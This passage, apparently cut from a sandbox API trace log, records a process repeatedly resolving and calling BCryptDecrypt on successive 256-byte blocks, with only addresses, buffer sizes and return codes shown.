lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.131] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037720, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037720, pcbResult=0x14f8fc) returned 0x0 [0172.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.133] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037815, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037815, pcbResult=0x14f8fc) returned 0x0 [0172.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.135] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203790a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203790a, pcbResult=0x14f8fc) returned 0x0 [0172.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.138] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e72fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20379ff, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20379ff, pcbResult=0x14f8fc) returned 0x0 [0172.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.140] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e730d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037af4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037af4, pcbResult=0x14f8fc) returned 0x0 [0172.317] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.317] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e731d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037be9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037be9, pcbResult=0x14f8fc) returned 0x0 [0172.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.319] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e732d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037cde, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037cde, pcbResult=0x14f8fc) returned 0x0 [0172.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.321] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e733d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037dd3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037dd3, pcbResult=0x14f8fc) returned 0x0 [0172.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.322] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e734d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037ec8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037ec8, pcbResult=0x14f8fc) returned 0x0 [0172.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.323] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e735d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2037fbd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2037fbd, pcbResult=0x14f8fc) returned 0x0 [0172.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.325] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e736d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20380b2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20380b2, pcbResult=0x14f8fc) returned 0x0 [0172.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.327] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e737d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20381a7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20381a7, pcbResult=0x14f8fc) returned 0x0 [0172.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.329] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e738d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203829c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203829c, pcbResult=0x14f8fc) returned 0x0 [0172.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.332] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e739d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038391, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038391, pcbResult=0x14f8fc) returned 0x0 [0172.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.334] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038486, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038486, pcbResult=0x14f8fc) returned 0x0 [0172.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.336] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203857b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203857b, pcbResult=0x14f8fc) returned 0x0 [0172.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.338] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038670, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038670, pcbResult=0x14f8fc) returned 0x0 [0172.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.340] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038765, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038765, pcbResult=0x14f8fc) returned 0x0 [0172.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.343] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203885a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203885a, pcbResult=0x14f8fc) returned 0x0 [0172.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.345] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e73fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203894f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203894f, pcbResult=0x14f8fc) returned 0x0 [0172.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.347] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e740d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038a44, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038a44, pcbResult=0x14f8fc) returned 0x0 [0172.349] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.349] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e741d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038b39, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038b39, pcbResult=0x14f8fc) returned 0x0 [0172.495] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.495] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e742d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038c2e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038c2e, pcbResult=0x14f8fc) returned 0x0 [0172.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.497] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e743d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038d23, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038d23, pcbResult=0x14f8fc) returned 0x0 [0172.499] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.499] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e744d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038e18, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038e18, pcbResult=0x14f8fc) returned 0x0 [0172.501] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.501] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e745d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2038f0d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2038f0d, pcbResult=0x14f8fc) returned 0x0 [0172.503] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.503] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e746d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039002, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039002, pcbResult=0x14f8fc) returned 0x0 [0172.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.505] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e747d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20390f7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20390f7, pcbResult=0x14f8fc) returned 0x0 [0172.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.507] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e748d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20391ec, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20391ec, pcbResult=0x14f8fc) returned 0x0 [0172.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.508] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e749d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20392e1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20392e1, pcbResult=0x14f8fc) returned 0x0 [0172.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.510] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20393d6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20393d6, pcbResult=0x14f8fc) returned 0x0 [0172.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.512] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20394cb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20394cb, pcbResult=0x14f8fc) returned 0x0 [0172.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.515] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20395c0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20395c0, pcbResult=0x14f8fc) returned 0x0 [0172.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.517] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20396b5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20396b5, pcbResult=0x14f8fc) returned 0x0 [0172.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.519] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20397aa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20397aa, pcbResult=0x14f8fc) returned 0x0 [0172.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.521] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e74fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203989f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203989f, pcbResult=0x14f8fc) returned 0x0 [0172.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.523] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e750d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039994, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039994, pcbResult=0x14f8fc) returned 0x0 [0172.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.525] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e751d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039a89, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039a89, pcbResult=0x14f8fc) returned 0x0 [0172.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.527] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e752d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039b7e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039b7e, pcbResult=0x14f8fc) returned 0x0 [0172.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.692] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e753d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039c73, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039c73, pcbResult=0x14f8fc) returned 0x0 [0172.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.694] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e754d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039d68, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039d68, pcbResult=0x14f8fc) returned 0x0 [0172.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.696] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e755d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039e5d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039e5d, pcbResult=0x14f8fc) returned 0x0 [0172.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.697] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e756d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2039f52, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2039f52, pcbResult=0x14f8fc) returned 0x0 [0172.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.698] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e757d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a047, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a047, pcbResult=0x14f8fc) returned 0x0 [0172.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.700] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e758d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a13c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a13c, pcbResult=0x14f8fc) returned 0x0 [0172.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.701] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e759d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a231, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a231, pcbResult=0x14f8fc) returned 0x0 [0172.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.702] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a326, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a326, pcbResult=0x14f8fc) returned 0x0 [0172.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.704] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a41b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a41b, pcbResult=0x14f8fc) returned 0x0 [0172.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.705] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a510, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a510, pcbResult=0x14f8fc) returned 0x0 [0172.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.707] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a605, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a605, pcbResult=0x14f8fc) returned 0x0 [0172.709] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.709] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a6fa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a6fa, pcbResult=0x14f8fc) returned 0x0 [0172.711] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.711] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e75fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a7ef, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a7ef, pcbResult=0x14f8fc) returned 0x0 [0172.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.712] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e760d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a8e4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a8e4, pcbResult=0x14f8fc) returned 0x0 [0172.713] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.713] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e761d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203a9d9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203a9d9, pcbResult=0x14f8fc) returned 0x0 [0172.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.715] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e762d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203aace, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203aace, pcbResult=0x14f8fc) returned 0x0 [0172.716] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.716] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e763d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203abc3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203abc3, pcbResult=0x14f8fc) returned 0x0 [0172.718] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.718] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e764d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203acb8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203acb8, pcbResult=0x14f8fc) returned 0x0 [0172.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.719] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e765d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203adad, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203adad, pcbResult=0x14f8fc) returned 0x0 [0172.720] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.720] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e766d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203aea2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203aea2, pcbResult=0x14f8fc) returned 0x0 [0172.722] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0172.722] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e767d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203af97, 